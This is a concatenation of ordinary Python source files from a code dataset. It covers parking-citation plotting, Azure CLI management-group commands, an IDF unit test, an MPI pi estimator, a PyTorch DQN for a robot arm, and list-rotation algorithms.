ln]\r\n ax_num.legend(ln, labels, loc = 0, fontsize = 16)\r\n\r\n #annotate\r\n for a,b in zip(x_axis, num):\r\n ax_num.annotate(str(b), xy=(a,b), xytext=(a-0.15, b*1.002), fontsize = 16)\r\n for a,b in zip(x_axis, avg):\r\n ax_avg.annotate(str(\"{:.2f}\".format(b)), xy=(a,b), xytext=(a-0.1, b*1.002), fontsize = 16)\r\n\r\n if isweek == True:\r\n plt.xticks(x_axis, dayname)\r\n else:\r\n plt.xticks(x_axis)\r\n plt.show()\r\n\r\ndef plot_num(x_axis, xlab, num, numlab, title, isweek = False):\r\n '''\r\n Line plot: x = x_axis y = num\r\n xlab, numlab for label\r\n if isweek == True, x will be daynames of aweek\r\n x, y label fontsize = 20\r\n title fontsize = 24\r\n '''\r\n \r\n assert len(x_axis) == len(num) #check data length\r\n assert all(isinstance(x, str) for x in [xlab, numlab, title])\r\n \r\n dayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n fig = plt.figure()\r\n \r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(x_axis, num, 'r--o', label='num')\r\n ax_num.set_xlabel(xlab, fontsize = 20)\r\n ax_num.set_ylabel(numlab, fontsize = 20)\r\n ax_num.set_title(title, fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.95, max(num)*1.05])\r\n\r\n\r\n #annotate\r\n for a,b in zip(x_axis, num):\r\n ax_num.annotate(str(b), xy=(a,b), xytext=(a-0.05, b*1.008))\r\n\r\n if isweek == True:\r\n plt.xticks(x_axis, dayname)\r\n else:\r\n plt.xticks(x_axis)\r\n plt.show()\r\n\r\n\r\n\r\ndef num_year():\r\n '''\r\n Number and Average Fine versus Years\r\n x-axis: year in [2015, 2016, 2017, 2018]\r\n y-axis: num, fine amount\r\n '''\r\n \r\n years = [2015, 2016, 2017, 2018]\r\n num = []\r\n avg_fine = []\r\n for year in years:\r\n df = pd.read_csv(str(year)+'parking-citations.csv')\r\n num.append(len(df))\r\n avg_fine.append(df.loc[:,'Fine amount'].mean())\r\n #plot\r\n plot_num_avg(x_axis = years, xlab = 'Years', num = num, numlab = 'Number of Citations per Year', avg = avg_fine, avglab = 'Average Fine Amount', title = 'Num. and Avg. Fine vs Year')\r\n\r\n\r\ndef num_month(year):\r\n '''\r\n Line chart: Number of citations over month in year [2015, 2016, 2017, 2018]\r\n x-axis: year in [2015, 2016, 2017, 2018]\r\n y-axis: num\r\n '''\r\n assert year in [2015, 2016, 2017, 2018, 'all']\r\n \r\n if year == 'all':\r\n df15 = pd.read_csv('2015parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp15 = df15['Fine amount'].groupby(df15['Issue Date'].dt.month)\r\n df16 = pd.read_csv('2016parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp16 = df16['Fine amount'].groupby(df16['Issue Date'].dt.month)\r\n df17 = pd.read_csv('2017parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp17 = df17['Fine amount'].groupby(df17['Issue Date'].dt.month)\r\n df18 = pd.read_csv('2018parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp18 = df18['Fine amount'].groupby(df18['Issue Date'].dt.month)\r\n\r\n x_axis = range(48)\r\n num = pd.concat([gp15.count(), gp16.count(), gp17.count(), gp18.count()], axis = 0, ignore_index = True)\r\n \r\n fig = plt.figure()\r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(x_axis, num, 'r--o', label='num')\r\n ax_num.set_xlabel('Months', fontsize = 20)\r\n ax_num.set_ylabel('Number of Citations per Month', fontsize = 20)\r\n ax_num.set_title('Number of citations vs Month Overall', fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.9, max(num)*1.05])\r\n ax_num.yaxis.set_ticklabels(['120K', '140K', '160K', '180K', '200K', '220K'])\r\n\r\n\r\n #annotate\r\n tag = []\r\n for a in range(2015, 2019):\r\n for b in range(1, 13):\r\n tag.append(str(a) + '.' + '{:0=2}'.format(b))\r\n for a in range(2,50,12):\r\n ax_num.annotate(tag[a] + ' ' + str(num[a]), xy=(a,num[a]), xytext=(a-4, num[a] + 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n for a in [10, 22, 34, 46]:\r\n ax_num.annotate(tag[a] + ' ' + str(num[a]), xy=(a,num[a]), xytext=(a-4, num[a] - 12000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n for a in [1, 25, 37]:\r\n ax_num.annotate(tag[a] + ' ' + str(num[a]), xy=(a,num[a]), xytext=(a, num[a] - 3000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n plt.xticks([])\r\n plt.show()\r\n \r\n \r\n else:\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'].dt.month)\r\n #plot\r\n plot_num(x_axis = range(1,13), xlab = 'Months', num = gp.count(), numlab = 'Number of Citations per Month', title = str(year) + ' ' + 'Number of citations vs Month')\r\n\r\n \r\ndef num_weekday(month, year):\r\n '''\r\n Line plot\r\n '''\r\n assert month in range(1,13) or month == 'all'\r\n assert year in [2015, 2016, 2017, 2018]\r\n\r\n import calendar\r\n dayname = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n if month == 'all':\r\n gp = df['Fine amount'].groupby(df['Issue Date'].dt.weekday)\r\n plot_num(x_axis = range(7), xlab = 'Months', num = gp.count(), numlab = 'Number of Citations per Weekday', title = str(year) + ' ' + 'Number of Citations vs Weekday', isweek = True)\r\n else:\r\n gp = df.loc[df['Issue Date'].dt.month == month]['Fine amount'].groupby(df['Issue Date'].dt.weekday)\r\n plot_num(x_axis = range(7), xlab = 'Months', num = gp.count(), numlab = 'Number of Citations per Weekday', title = str(year) + ' ' + calendar.month_name[month]+ ' Number of Citations vs Month', isweek = True)\r\n\r\ndef dayofyear(year, month = [1,12]):\r\n '''\r\n Plot a line chart. Number of citations vs Date in a specific year \r\n Input:\r\n year: year in [2015, 2016, 2017, 2018]\r\n '''\r\n \r\n assert year in [2015, 2016, 2017, 2018]\r\n assert isinstance(month, list)\r\n assert isinstance(month[0], int) and month[0] > 0\r\n assert isinstance(month[1], int) and month[1] < 13\r\n \r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n df = df[df['Issue Date'].dt.month <= month[1]]\r\n df = df[df['Issue Date'].dt.month >= month[0]]\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n fig = plt.figure()\r\n x_axis = gp.count().index\r\n ax_num = fig.add_subplot(111)\r\n ax_num.xaxis.set_major_formatter(mdate.DateFormatter('%Y-%m-%d'))\r\n #ax_num.plot(x_axis, gp.count(), 'b-', label='num', linewidth = 0.5)\r\n ax_num.set_xlabel('Date', fontsize = 20)\r\n ax_num.set_ylabel('Number of Citations per Day', fontsize = 20)\r\n ax_num.set_title(str(year) + ' ' + 'Number of Citations vs Date', fontsize = 24)\r\n ax_num.set_ylim([min(gp.count())*0.5, max(gp.count())*1.15])\r\n\r\n #fill\r\n avg = gp.count().mean()\r\n plt.fill_between(x_axis, gp.count(), avg, where= gp.count() >= avg, facecolor = 'green', interpolate = True, alpha = 0.7)\r\n plt.fill_between(x_axis, gp.count(), avg, where= gp.count() <= avg, facecolor = 'red', interpolate = True, alpha = 0.7)\r\n\r\n #annotate\r\n plt.annotate('Max ' + str(gp.count().idxmax().to_pydatetime().date()) + ' ' + str(gp.count().max()), xy = (gp.count().idxmax(), gp.count().max()), xytext = (gp.count().idxmax() + pd.Timedelta(weeks = 2), gp.count().max()*1.05), arrowprops=dict(facecolor='steelblue', shrink=0.02), fontsize=15, color='black')\r\n plt.annotate('Min ' + str(gp.count().idxmin().to_pydatetime().date()) + ' ' + str(gp.count().min()), xy = (gp.count().idxmin(), gp.count().min()), xytext = (gp.count().idxmin() - pd.Timedelta(weeks = 6), gp.count().min()*1.00), arrowprops=dict(facecolor='steelblue', shrink=0.02), fontsize=15, color='black')\r\n \r\n plt.xticks(pd.date_range(x_axis[0], x_axis[-1], freq = 'M'), rotation = 0)\r\n plt.show()\r\n\r\ndef bar_month():\r\n '''\r\n Bar chart: x = month y = Number of Citations per Month each year\r\n y starts from 100000\r\n '''\r\n\r\n df15 = pd.read_csv('2015parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp15 = df15['Fine amount'].groupby(df15['Issue Date'].dt.month)\r\n df16 = pd.read_csv('2016parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp16 = df16['Fine amount'].groupby(df16['Issue Date'].dt.month)\r\n df17 = pd.read_csv('2017parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp17 = df17['Fine amount'].groupby(df17['Issue Date'].dt.month)\r\n df18 = pd.read_csv('2018parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp18 = df18['Fine amount'].groupby(df18['Issue Date'].dt.month)\r\n\r\n\r\n x_axis = range(2,26,2)\r\n bar1 = plt.bar(x = [i - 0.15 for i in x_axis], height = gp15.count(), width = 0.3, color = 'red', label = '2015')\r\n bar2 = plt.bar(x = [i + 0.15 for i in x_axis], height = gp16.count(), width = 0.3, color = 'green', label = '2016')\r\n bar3 = plt.bar(x = [i + 0.45 for i in x_axis], height = gp17.count(), width = 0.3, color = 'pink', label = '2017')\r\n bar4 = plt.bar(x = [i + 0.75 for i in x_axis], height = gp18.count(), width = 0.3, color = 'purple', label = '2018')\r\n\r\n plt.ylabel('Number of Citations per Month', fontsize = 20)\r\n plt.xticks([i + 0.3 for i in x_axis], range(1,13))\r\n plt.xlabel('Month', fontsize = 20)\r\n plt.title('Number of Citations vs Month in Each Year', fontsize = 24)\r\n plt.ylim([120000, 220000])\r\n plt.legend()\r\n\r\n plt.show()\r\n\r\ndef timeofday(year):\r\n '''\r\n Line Chart: Citations over Period of Day(half an hour)\r\n '''\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue time'])\r\n lbin = list(range(30, 2430,100)) + list(range(0, 2500, 100))\r\n lbin.sort()\r\n cut1 = pd.cut(df['Issue time'], lbin, right = False, include_lowest = True)\r\n num = cut1.value_counts(sort = False)\r\n \r\n fig = plt.figure()\r\n ax_num = fig.add_subplot(111)\r\n ln1 = ax_num.plot(range(48), num, 'r--o', label='num')\r\n ax_num.set_xlabel('Time Period of Day', fontsize = 20)\r\n ax_num.set_ylabel('Number of Citations', fontsize = 20)\r\n ax_num.set_title(str(year) + ' ' + 'Number of Citations vs Time Period of Day', fontsize = 24)\r\n ax_num.set_ylim([min(num)*0.95, max(num)*1.05])\r\n\r\n \r\n ax_num.annotate('8:00', xy=(16,num[800]), xytext=(12, num[800] - 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n ax_num.annotate('10:00', xy=(20,num[1000]), xytext=(20, num[800] + 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black') \r\n ax_num.annotate('12:00', xy=(24,num[1200]), xytext=(26, num[1200] - 6000), arrowprops=dict(arrowstyle='->', connectionstyle='arc3'), fontsize=15, color='black')\r\n\r\n plt.xticks(range(0, 48, 6), [num.keys()[x] for x in range(0, 48, 6)], rotation = 0, fontsize = 14)\r\n plt.show()\r\n \r\ndef bar_date(year):\r\n '''\r\n Bar chart: Number of Citations via date\r\n '''\r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n\r\n x_axis = gp.count().index\r\n fig = plt.figure()\r\n ax_num = fig.add_subplot(111)\r\n ax_num.xaxis.set_major_formatter(mdate.DateFormatter('%Y-%m-%d'))\r\n \r\n ax_num.bar(x = gp.count().index, height = gp.count(), width = 1, color = 'red', label = str(year))\r\n ax_num.set_ylabel('Number of Citations per Month')\r\n ax_num.set_xlabel('Month')\r\n ax_num.set_title('Number of Citations vs Month in Each Year')\r\n plt.xticks(pd.date_range(x_axis[0], x_axis[-1], freq = 'M'), rotation = 45)\r\n plt.show()\r\n\r\ndef bar_date_top(year, top = 10, reverse = False):\r\n '''\r\n Bar chart: Plot top(or bottom) Number of Citations Date\r\n\r\n Input:\r\n year: which year of data to analyse\r\n top: number of data to be ploted\r\n reverse: choose top or bottom(top is False)\r\n\r\n '''\r\n \r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n num = gp.count().sort_values(ascending = reverse)[:top]\r\n x_axis = range(top)\r\n \r\n fig = plt.figure()\r\n \r\n ax_num = fig.add_subplot(111)\r\n ax_num.bar(x = x_axis, height = num, width = 0.8, color = 'red', label = str(year))\r\n ax_num.set_ylabel('Number of Citations per Day', fontsize = 20)\r\n if reverse == False:\r\n ax_num.set_title(str(year) + ' Most Amounts of Citations Date', fontsize = 24)\r\n else:\r\n ax_num.set_title(str(year) + ' Least Amounts of Citations Date', fontsize = 24)\r\n\r\n for a,b in zip(x_axis, num):\r\n ax_num.text(a, b+1, num.index[a].to_pydatetime().strftime(\"%a\") + ', ' + str(b), ha=\"center\", va=\"bottom\", fontsize = 15)\r\n plt.ylim([0,num.max()*1.3])\r\n plt.xticks(x_axis,[str(x.to_pydatetime().date()) for x in num.index],rotation = 45, fontsize = 14)\r\n plt.savefig('')\r\n plt.show()\r\n\r\ndef calheatmap(year):\r\n '''\r\n Plot a Calendar heat map. Number of citations vs Date in a specific year \r\n Input:\r\n year: year in [2015, 2016, 2017, 2018]\r\n '''\r\n \r\n assert year in [2015, 2016, 2017, 2018]\r\n \r\n df = pd.read_csv(str(year)+'parking-citations.csv', parse_dates = ['Issue Date'])\r\n gp = df['Fine amount'].groupby(df['Issue Date'])\r\n calmap.calendarplot(gp.count(), fig_kws = {'figsize':(16,10)}, yearlabels = False, subplot_kws = {'title':'Number of Citations in Year ' + str(year)})\r\n plt.show()\r\n \r\nif __name__ == \"__main__\":\r\n num_year()\r\n #dayofyear(2015, [1,4])\r\n #dayofyear(2016, [1,12])\r\n #dayofyear(2017, [1,12])\r\n #dayofyear(2018, [1,4])\r\n #num_month(2015)\r\n #num_month(2016)\r\n #num_month(2017)\r\n #num_month(2018)\r\n #num_month('all')\r\n #bar_month()\r\n #num_weekday('all', 2015)\r\n #num_weekday('all', 2016)\r\n #bar_date_top(year = 2015, top = 10, reverse = False)\r\n #bar_date_top(year = 2015, top = 10, reverse = True)\r\n #timeofday(2015)\r\n #timeofday(2016)\r\n #timeofday(2017)\r\n timeofday(2018)\r\n #calheatmap(2018)\r\n","sub_path":"chrono.py","file_name":"chrono.py","file_ext":"py","file_size_in_byte":15976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346039681","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core._profile import Profile\n\n\ndef _register_rp(cli_ctx, subscription_id=None):\n rp = \"Microsoft.Management\"\n from azure.cli.core.commands.client_factory import get_mgmt_service_client\n from azure.cli.core.profiles import ResourceType\n import time\n rcf = get_mgmt_service_client(\n cli_ctx,\n ResourceType.MGMT_RESOURCE_RESOURCES,\n subscription_id)\n rcf.providers.register(rp)\n while True:\n time.sleep(10)\n rp_info = rcf.providers.get(rp)\n if rp_info.registration_state == 'Registered':\n break\n\n\ndef _get_subscription_id_from_subscription(cli_ctx, subscription): # pylint: disable=inconsistent-return-statements\n profile = Profile(cli_ctx=cli_ctx)\n subscriptions_list = profile.load_cached_subscriptions()\n for sub in subscriptions_list:\n if sub['id'] == subscription or sub['name'] == subscription:\n return sub['id']\n from azure.cli.core.util import CLIError\n raise CLIError(\"Subscription not found in the current context.\")\n\n\ndef cli_managementgroups_group_list(cmd, client):\n _register_rp(cmd.cli_ctx)\n return client.list()\n\n\ndef cli_managementgroups_group_show(\n cmd,\n client,\n group_name,\n expand=False,\n recurse=False):\n _register_rp(cmd.cli_ctx)\n if expand:\n return client.get(group_name, \"children\", recurse)\n return client.get(group_name)\n\n\ndef cli_managementgroups_group_create(\n cmd,\n client,\n group_name,\n display_name=None,\n parent_id=None):\n _register_rp(cmd.cli_ctx)\n return client.create_or_update(\n group_name, \"no-cache\", display_name, parent_id)\n\n\ndef cli_managementgroups_group_update_custom_func(\n instance,\n display_name=None,\n parent_id=None):\n instance[\"display_name\"] = display_name\n instance[\"parent_id\"] = parent_id\n return instance\n\n\ndef cli_managementgroups_group_update_get():\n update_parameters = {'display_name': None, 'parent_id': None}\n return update_parameters\n\n\ndef cli_managementgroups_group_update_set(\n cmd, client, group_name, parameters=None):\n _register_rp(cmd.cli_ctx)\n return client.update(\n group_name,\n \"no_cache\",\n parameters[\"display_name\"],\n parameters[\"parent_id\"])\n\n\ndef cli_managementgroups_group_delete(cmd, client, group_name):\n _register_rp(cmd.cli_ctx)\n return client.delete(group_name)\n\n\ndef cli_managementgroups_subscription_add(\n cmd, client, group_name, subscription):\n subscription_id = _get_subscription_id_from_subscription(\n cmd.cli_ctx, subscription)\n _register_rp(cmd.cli_ctx)\n _register_rp(cmd.cli_ctx, subscription_id)\n return client.create(group_name, subscription_id)\n\n\ndef cli_managementgroups_subscription_remove(\n cmd, client, group_name, subscription):\n subscription_id = _get_subscription_id_from_subscription(\n cmd.cli_ctx, subscription)\n _register_rp(cmd.cli_ctx)\n _register_rp(cmd.cli_ctx, subscription_id)\n return client.delete(group_name, subscription_id)\n","sub_path":"src/managementgroups/azext_managementgroups/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"150214012","text":"from unittest import TestCase\n\nfrom test import add_src_path\nadd_src_path()\nfrom embedding.idf import Idf\n\n\nclass TestIdf(TestCase):\n def test_get_idf(self):\n idf = Idf(['aa bb cc', 'aa dd ee', 'dd kk aa'])\n a_res = idf.get_idf('aa')\n d_res = idf.get_idf('dd')\n b_res = idf.get_idf('bb')\n self.assertEqual(a_res, 1)\n self.assertTrue(a_res < d_res)\n self.assertTrue(d_res < b_res)\n","sub_path":"test/embedding/test_idf.py","file_name":"test_idf.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651353367","text":"from mpi4py import MPI\nimport numpy as np\n\ndef main():\n\t\"Module 6 (Non-blocking)\"\n\n\tcomm = MPI.COMM_WORLD\n\trank = comm.Get_rank()\n\tsize = comm.Get_size()\n\tARRSIZE = 10**7\n\tresult = []\n\t\n\tif rank == 0:\n\t\tstart = MPI.Wtime()\n\t\tfor i in range(1,size):\n\t\t\treqin = comm.irecv(source = MPI.ANY_SOURCE, tag = 22)\n\t\t\tdata = reqin.wait()\n\t\t\tresult.append(data)\n\t\tprint(\"Module 6 (Non-blocking)\\n\")\n\t\tprint(\"RAW ARRAY:\\t\",result,\"\\n\")\n\t\tprint(\"Average Pi Estimation:\\t\",(sum(i['pi'] for i in result)/len(result)))\n\t\tprint(\"Average Execution Time:\\t\",(sum(i['time'] for i in result)/len(result)))\n\t\tprint(\"Total Execution Time:\\t\",MPI.Wtime()-start,\"\\n\")\n\t\tfor i in result:\n\t\t\tprint(\"Pi Estimation:\\t\",i['pi'],\"\\tExecution Time:\\t\",i['time'])\n\t\treturn result\n\telse:\n\t\tstart = MPI.Wtime()\n\t\tdata = np.random.rand(ARRSIZE*2)\n\t\tinside = np.sum((data[:ARRSIZE]**2 + data[ARRSIZE:]**2) <= 1)\n\t\tpi = 4 * inside / ARRSIZE\n\t\ttime = MPI.Wtime()-start\n\t\tdata = {'pi':pi,'time':time} \n\t\treqout = comm.isend(data, dest = 0, tag = 22)\n\t\treqout.wait()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Module6/MCPi_python_nonblocking2.py","file_name":"MCPi_python_nonblocking2.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"206066682","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchvision.models as models\nimport numpy as np\nimport math\nimport os\nimport random\n\n# 超参数\nBATCH_SIZE = 60\nLR = 0.001 # learning rate\nEPSILON = 0.9 # 最优选择动作百分比\nGAMMA = 0.9 # 奖励递减参数\nTARGET_REPLACE_ITER = 100 # Q 现实网络的更新频率\nMEMORY_CAPACITY = 30000 # 记忆库大小\nN_ACTIONS = 7 # 机械臂能做的动作\nN_STATES = 224*224*4\n\n\nclass Net(nn.Module):\n\n def __init__(self):\n super(Net, self).__init__()\n self.dense121 = models.resnet50(True) #(1, 1000)\n self.fc1 = nn.Linear(2000 + 3, 2048)\n self.fc2 = nn.Linear(2048, 64)\n self.fc3 = nn.Linear(64, 3)\n # self.fc3.weight.data *= 10\n\n def forward(self, rgb, deep, joint):\n rgb = self.dense121(rgb)\n deep = self.dense121(deep)\n # x = x.view(-1, 48*4*4)\n x = torch.cat([rgb.float(), deep.float(), joint.float()], dim=1)\n a = self.fc1(x)\n x = F.relu(self.fc2(a))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:]\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\n\nclass DQN(object):\n def __init__(self):\n self.device_ids = [0, 1]\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.eval_net = Net().cuda(self.device_ids[0]) # .to(self.device)\n self.target_net = Net().cuda(self.device_ids[0])\n self.eval_net = nn.DataParallel(self.eval_net, device_ids=self.device_ids)\n self.target_net = nn.DataParallel(self.target_net, device_ids=self.device_ids)\n self.learn_step_counter = 0 # 用于target更新计时\n self.memory_counter = 0 # 记忆库计数\n self.memory = np.zeros((MEMORY_CAPACITY, (224*224*4+3)*2+4))\n self.optimizer = torch.optim.Adam(self.eval_net.parameters(), lr=LR) # torch1 的优化器\n self.optimizer = nn.DataParallel(self.optimizer, device_ids=self.device_ids)\n self.loss_func = nn.MSELoss() # 误差公式\n\n # 根据神经网络选取一个值\n\n\n def choose_action(self, x):\n a = np.random.randint(1, 1000)\n # if a > 10:\n if np.random.uniform() < EPSILON*(math.exp(self.memory_counter-5000) if self.memory_counter <= 5000 else 1):\n # print \"****action from net****\"\n joint_view, image_view = x\n image_view = image_view / (256 * 256)\n image_view = image_view.astype(np.float32)\n rgb_np = np.array(image_view).reshape(-1, 224, 224, 4)[:, :, :, :3]\n dep_np = np.array(image_view).reshape(-1, 224, 224, 4)[:, :, :, 3].reshape(-1, 224, 224, 1)\n dep_np = np.concatenate((dep_np, dep_np, dep_np), axis=3)\n image_view_rgb = torch.from_numpy(rgb_np)\n image_view_rgb = image_view_rgb.permute(0, 3, 1, 2).cuda()\n image_view_dep = torch.from_numpy(dep_np)\n image_view_dep = image_view_dep.permute(0, 3, 1, 2).cuda()\n joint_view = torch.from_numpy(np.array(joint_view).reshape(-1, 3)).cuda()\n action = self.eval_net.forward(image_view_rgb, image_view_dep, joint_view).detach()\n action = action.cpu().numpy()\n else:\n # print \"****action for rand****\"\n action = np.random.uniform(low=-1.5, high=1.5, size=3)\n action = action[np.newaxis, :]\n return action\n\n def store_transition(self, s, a, r, s_):\n a = np.array(a).reshape(-1, 3)\n if a[0][0] is np.nan:\n return\n s1, s2 = s\n s3, s4 = s_\n\n if str(type(s3)) == '':\n s_ = s\n # s3 == list == numpy.float todo\n s3, s4 = s_\n s1 = np.array(s1).reshape(-1, 3)\n s2 = np.array(s2).reshape(-1, 224*224*4)\n r = np.array(r).reshape(-1, 1)\n s3 = np.array(s3).reshape(-1, 3)\n s4 = np.array(s4).reshape(-1, 224*224*4)\n\n transition = np.hstack((s1, s2, a, r, s3, s4))\n index = self.memory_counter % MEMORY_CAPACITY\n self.memory[index, :] = transition\n self.memory_counter += 1\n\n def learn(self):\n # type: () -> object\n # target net 参数更新\n # if self.learn_step_counter % TARGET_REPLACE_ITER == 0:\n # self.target_net.load_state_dict(self.eval_net.state_dict())\n self.learn_step_counter += 1\n\n # 抽取记忆库中的批数据\n sample_index = np.random.choice(MEMORY_CAPACITY, BATCH_SIZE)\n b_memory = self.memory[sample_index, :]\n b_joint1 = torch.FloatTensor((b_memory[:, :3]).reshape(-1, 3)).cuda()\n rgb_np = (b_memory[:, 3:N_STATES + 3]).reshape(-1, 224, 224, 4)[:, :, :, :3]\n dep_np = (b_memory[:, 3:N_STATES + 3]).reshape(-1, 224, 224, 4)[:, :, :, 3].reshape(-1, 224, 224, 1)\n dep_np = np.concatenate((dep_np, dep_np, dep_np), axis=3)\n b_rgb2 = torch.FloatTensor(rgb_np).permute(0, 3, 1, 2).cuda()\n b_dep2 = torch.FloatTensor(dep_np).permute(0, 3, 1, 2).cuda()\n # b_s = b_s1, b_s2\n b_a = torch.LongTensor((b_memory[:, N_STATES+3:N_STATES + 6]).reshape(-1, 3).astype(float)).cuda()\n b_r = torch.FloatTensor((b_memory[:, N_STATES + 6:N_STATES + 7]).reshape(-1, 1)).cuda()\n b_joint_1 = torch.FloatTensor((b_memory[:, N_STATES + 7:N_STATES + 10]).reshape(-1, 3)).cuda()\n rgb_np_ = (b_memory[:, -N_STATES:]).reshape(-1, 224, 224, 4)[:, :, :, :3]\n dep_np_ = (b_memory[:, -N_STATES:]).reshape(-1, 224, 224, 4)[:, :, :, 3].reshape(-1, 224, 224, 1)\n dep_np_ = np.concatenate((dep_np_, dep_np_, dep_np_), axis=3)\n b_rgb_2 = torch.FloatTensor(rgb_np_).permute(0, 3, 1, 2).cuda()\n b_dep_2 = torch.FloatTensor(dep_np_).permute(0, 3, 1, 2).cuda()\n\n # 针对做过的动作b_a, 来选 q_eval 的值, (q_eval 原本有所有动作的值)\n q_eval = self.eval_net(b_rgb2, b_dep2, b_joint1) # shape (batch, 1) picture and joint\n q_next = self.target_net(b_rgb_2, b_dep_2, b_joint_1).detach() # q_next 不进行反向传递误差, 所以 detach\n q_target = b_r + GAMMA * q_next # shape (batch, 1)\n loss = self.loss_func(q_eval, q_target)\n\n # 计算, 更新 eval net\n self.optimizer.zero_grad()\n loss.backward()\n # self.optimizer.step()\n self.optimizer.module.step()\n\n def save_model(self):\n model_number = self.get_file_number(\"eval_dqn\")\n print(\"model_number:\",model_number)\n torch.save(self.eval_net, \"model/eval_dqn/\" + str(model_number) + \".pkl\")\n torch.save(self.target_net, \"model/target_dqn/\" + str(model_number) + \".pkl\")\n\n def get_file_number(self, dir_name):\n a = 0\n file_dir = \"/home/ljt/ws/src/fetch_moveit_config/model/\"\n for root, dirs, files in os.walk(file_dir+dir_name):\n a = len(files)\n return a\n\n def get_last_model(self, dir_name):\n a = 0\n file_dir = \"/home/ljt/ws/src/fetch_moveit_config/model/\"\n lists = os.listdir(file_dir+dir_name) # 列出目录的下所有文件和文件夹保存到lists\n lists.sort(key=lambda fn: os.path.getmtime(file_dir+dir_name + \"/\" + fn)) # 按时间排序\n return int(lists[-1][:-4])\n\n\nif __name__ == \"__main__\":\n net = DQN()\n # print net.get_file_number(\"target_dqn\")\n # print net.get_last_model(\"target_dqn\")\n\n # input = torch.randn(3), torch.randn(4, 224, 224)\n # input = np.random.randn(3), np.random.randn(4, 224, 224)\n # out = net.choose_action(input)\n # # net.learn()\n # print(type(out))\n\n\n\n","sub_path":"DQN_SERVER/DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"229120968","text":"'''\nCreated on 2012-2-1\n\n@author: Administrator\n'''\ndef moveInTurn(sequence, length, distance):\n try:\n# print(sequence)\n if length % distance == 0:\n '''divisibility'''\n for i in range(0, distance):\n temp = sequence[i]\n j = i + distance\n while j < length:\n sequence[j - distance] = sequence[j]\n j = j + distance\n sequence[j - distance] = temp\n else:\n '''Not divisibility'''\n i = 0\n temp = sequence[0]\n for j in range(0, length - 1):\n \n sequence[i] = sequence[(i + distance) % length]\n i = (i + distance) % length\n# print(sequence)\n sequence[i] = temp\n# print(sequence)\n except:\n import traceback\n traceback.print_exc()\n print(\"ERROR LIST = \", sequence)\n print(\"i = \", i)\n print(\"j = \", j)\n return sequence\n\ndef moveRecursively(sequence, length, distance):\n distance = distance % length\n if distance <= 0:\n return sequence\n if distance <= length / 2:\n for i in range(0, distance):\n #ABC -> CBA\n temp = sequence[i]\n sequence[i] = sequence[length - distance + i]\n sequence[length - distance + i] = temp \n sequence = moveRecursively(sequence[:length - distance], length - distance, distance)\\\n + sequence[length - distance:length]\n return sequence\n else:\n half = int(length / 2)\n sequence = moveRecursively(sequence, length, half)\n sequence = moveRecursively(sequence, length, distance - half)\n return sequence\n\ndef moveReversely(sequence, length, distance):\n distance = distance % length\n def reverse(l):\n length = len(l)\n half = int(len(l) / 2)\n for i in range(0, half):\n temp = l[i]\n l[i] = l[length - 1 - i]\n l[length - 1 - i] = temp\n return l\n\n sequence = reverse(sequence[0 : distance]) + sequence[distance : length]\n# print(sequence)\n sequence = sequence[0 : distance] + reverse(sequence[distance : length])\n# print(sequence)\n sequence = reverse(sequence)\n# print(sequence)\n return sequence\n\nif __name__ == '__main__':\n i = 7\n l = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n# l = [1, 2, 3, 4, 